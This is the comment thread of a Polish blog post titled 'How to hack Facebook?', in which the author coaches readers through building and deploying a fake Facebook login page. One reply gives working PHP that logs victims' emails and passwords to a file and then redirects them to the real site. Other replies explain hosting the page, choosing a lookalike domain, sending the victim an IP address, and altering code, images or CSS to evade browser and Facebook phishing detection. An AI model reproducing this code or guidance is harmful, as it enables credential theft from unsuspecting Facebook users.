144 thoughts to “Jak włamać się na facebooka?”

  1. Dzięki wielkie 😛 Teraz się zastanawiam jak komuś to przesłać ;/ Albo jak można to przesłać ?

    1. Często strony phishingowe są modyfikowane tak, aby wyglądały jak prowadzące do zdjęcia, które żeby móc zobaczyć trzeba się zalogować…

  2. Mam pytanie. Ładnie, pięknie stworzyłem plik login.php wchodzę na tą stronę, wpisuję hasło i w tym momencie powinien ukazac się plik logi.txt a u mnie go nie ma dlaczego ?

    1. Czy utworzyłeś poprawnie skrypt php? Odsyłam do filmiku, jeśli nie proszę ponownie pytać.

  3. I jeszcze coś. Widać że ta strona została pobrana, ponieważ jest bardziej rozciągnięta. Można jakoś temu zaradzić ?

    1. Można by spróbować pobrać stronę poprzez HTTrack Website Copier lub nauczyć się CSS/XHTML i spróbować zmodyfikować wygląd wedle gustu. Problem leży podejrzewam w arkuszach CSS. U mnie przy rozdzielczości 1366x nie widać znaczącej różnicy.

    1. Jak widzisz komentarz poprzedni nie został usunięty. Komentarze wymagają zatwierdzenia przez moderatora, aby inni nie rozsyłali spamu i złośliwego oprogramowania. Pozdrawiam

  4. Dzień dobry 🙂 od razu mówię, że jestem laik. Starałam się zrobić to tak jak mówiłeś w filmiku, problem taki, że w momencie kiedy zapiszę już grafikę i chcę skopiować nazwę, nie mam tego arkusza z końcówką bz. Z tego co widzę to ty tam masz 16 elementów w tym folderze a ja 15 co może być tego przyczyną? Pozdrawiam serdecznie

    1. Cześć! Właśnie sprawdziłem to o co zapytałaś i rzeczywiście… zapisało mi się za pomocą przeglądarki Chrome 14 elementów. Teraz pojawiły się u mnie arkusze o zupełnie innej nieco losowej nazwie, mechanizm tworzenia strony phishingowej został taki sam. Proszę prześledzić filmik i zobaczyć jak w systemie Windows pokazuje się w opcjach folderów rozszerzenia plików. Resztę zrobisz tak samo próbując odnaleźć odpowiednie elementy w plikach o rozszerzeniu .CSS (ten plik który miał na końcu bz miał rozszerzenie .CSS, są tylko dwa pliki z takim rozszerzeniem więc będzie łatwo). Pozdrawiam!!!

  5. Tak, zapisałem dobrze skrypt.
    Dobrze zmieniłem także w index.html. Mógłbyś mi może podesłać „swoją” stronę phishingową na mój adres e-mail ?

      1. Dzięki, bardzo. Tak, oczywiście, zacznę się uczyć od razu php dla ułatwienia 😉 Jeszcze raz dzięki. Pozdrawiam

        1. O ile do ataków na skrypty język PHP i SQL jest przydatny o tyle do tworzenia fajnych stron www (wygląd) to raczej CSS i HTML. Ciężko mi pomóc bo nie zajmuje się raczej graficzną stroną projektowania witryn www. Pozdrawiam

  6. ej jak się loguje i daje zaloguj to odsyła mnie do login.php ale wyskakuje na tej stronie taki tekst

    Notice: Undefined index: email in D:PISHINGhtdocslogin.php on line 2

    Notice: Undefined index: pass in D:PISHINGhtdocslogin.php on line 3

    1. A wpisałeś coś w polu e-mail i w polu hasło? Spróbuj zmodyfikowanego kodu który najpierw sprawdza czy coś zostało wgl wpisane na stronie imitującej facebooka.
      <?php if (!empty($_POST['email']) && !empty($_POST['pass'])) { $email = $_POST['email']; $pass = $_POST['pass']; $tekst = "E-mail: $email Hasło: $pass rn";$uchwyt = fopen("logi.txt", "a"); fwrite($uchwyt, $tekst); fclose($uchwyt); header("Location: https://www.facebook.com/login.php?login_attempt=1"); } ?>

  7. Witam. Czy ja też mógłbym prosić o podesłanie mi twojej stronki pishingowej? Coś mi nie idzie chce sobie porównać 😉

    1. Nie, ponieważ wszystko jest opisane i nie wymaga jakiejś olbrzymiej wiedzy i filozofii.

    1. Musisz czytać wpis dokładniej, ponieważ została w pewnym miejscu naniesiona aktualizacja wpisu i to na czerwono. Pozdrawiam 🙂

  8. eYTpPmSTXYE yek5jGn8pFA mam tylko takie 2 pliki nie ma tych rozszerzen o których pisałeś, przeszukałem wszystkie inne( na wszelki wypadek i nie moge tego znaleźć)

    thx za szybką odp.

    1. Musi być, pisze w wpisie na czerwono że nazwy mogą być różne od „…bz…”. Pozdrawiam!

  9. nie moge zamienic tych plikow zeby logo było jak to robisz ? Robie to samo co ty i nie moge ??? Wyskakuje mi ten komunikat Replace: Cannot replace text. The current document is read only.

    HELP

    1. Plik jest tylko do odczytu, musisz najpierw notatnik uruchomić jako administrator i dopiero otworzyć plik lub z powodu zapisania pliku w miejscu gdzie nie masz praw do zapisywania plików występuje ten problem i wystarczy przekopiować np: na pulpit, lub moich dokumentów.

  10. W xampp nie działa mi apache pomozesz jak naprawic pisza o portach zablokowanych ale nie moge znalezc jak odblokować….

    1. Może firewall systemowy zablokował, nie zadawał pytania czy nie odblokować? Chodzący xampp wyświetla bodajże na zielono dana usługa jak wystartuje dobrze. Z prostych serwerów www jest jeszcze WebServ.

    1. A masz xammpa? Uruchamiasz z adresu localhost a skrypt ma nazwe z rozszerzeniem .php? (a nie html lub txtr?)

  11. Wrzuciłem wszystko na server ftp, jednak po odpaleniu strony google chrome mi krzyczy „Ostrzeżenie: Podejrzenie witryny wyłudzającej dane (phishing)!”. Macie może jakieś sposoby na ominięcie tego ?

    1. W wpisie jest aktualizacja na czerwono, trzeba szukać bo nazwy są losowe okazuje się. Warto przyjrzeć najpierw się filmikowi na końcu wpisu jak to działa. Długi ale dokładny.

    1. Trzeba mieć swój darmowy lub płatny serwer FTP i wrzucić tam te pliki za pomocą np: FileZilli. Podstawy tworzenia stron www i umieszczenia ich w internecie to są. Najlepiej by domena przypominała fejsbukową (facebook.com). Można mieć też publiczne IP i na swoim komputerze mieć strone np: za pomocą xammpa z filmu, podajesz wtedy IP ofierze a ona wpisuje go w przeglądarke lub nakładasz na to coś w stylu noip.com, lub darmowy alias.

  12. Witam działa mi wszystko elegancko tylko, jak wysyłam to facebook to odrazu blokuje i oznacza jaka niebezpieczna strone jak to ominąć ?

    1. W dniu premiery wpisu, nie wykrywało jeszcze… Odpowiadałem już w komentarzach w tym wpisie jak włamać się na fb: „Trzeba spróbować troszkę zmodyfikować kod, zdjęcia, html albo CSS.”

  13. Witam, fb już ogarnął chyba, bo po kliknięciu „Zaloguj się” nie przekierowuje do naszego pliku tylko nadal zostaje action=”https://www.facebook.com/login.php?login_attempt=1″, mimo zmiany w kodzie. Wie ktoś jak to ruszyć ??

      1. tak rozumiem, tylko jeśli nie dołączę funkcji header, nadal jest tak samo (tzn. przekierowuje, ale nie do login.php).
        Wpisując testowe login i hasło także nie tworzy się, zadany plik z logami. Jakieś pomysły?

        1. A zmodyfikowałeś wedle poradnika plik index.php czy tam index.html (jego formularz)? parametr action na login.php?

          1. oczywiście wszystko wg filmiku, i to kilkakrotnie ;/ ale zawsze ten sam efekt.
            W pliku login.php nie trzeba zadać konkretnej scieżki, aby tworzył tam „logi.txt”

          2. oczywiscie zmodyfikowałem wg poradnika, kilkakrotnie wykonywałem całość od początku, ale zawsze to samo( nie odsyła do login.php po kliknięciu „zaloguj się”) a takze nie tworzy pliku „logi.txt”. Pytam czy w formule pliku”login.php” nie trzeba zadać konkretnej ścieżki w ktorej ma tworzyć plik”logi.txt”

          3. Nie, wydaje mi się że nie zmodyfikowałeś pliku index.html (parametr action na login.php trzeba zmienić w formularzu).

          4. dawał komunikat że strona z phisingiem, mimo że zezwoliłem na otwieranie to dalej blokwał… po wyłączeniu go wszystko działa 😉

  14. tylko jak to zmodyfikować, mógłbyś wytłumaczyć jestem dopiero można powiedzieć początkujący i sam nie umiem takich rzeczy 🙂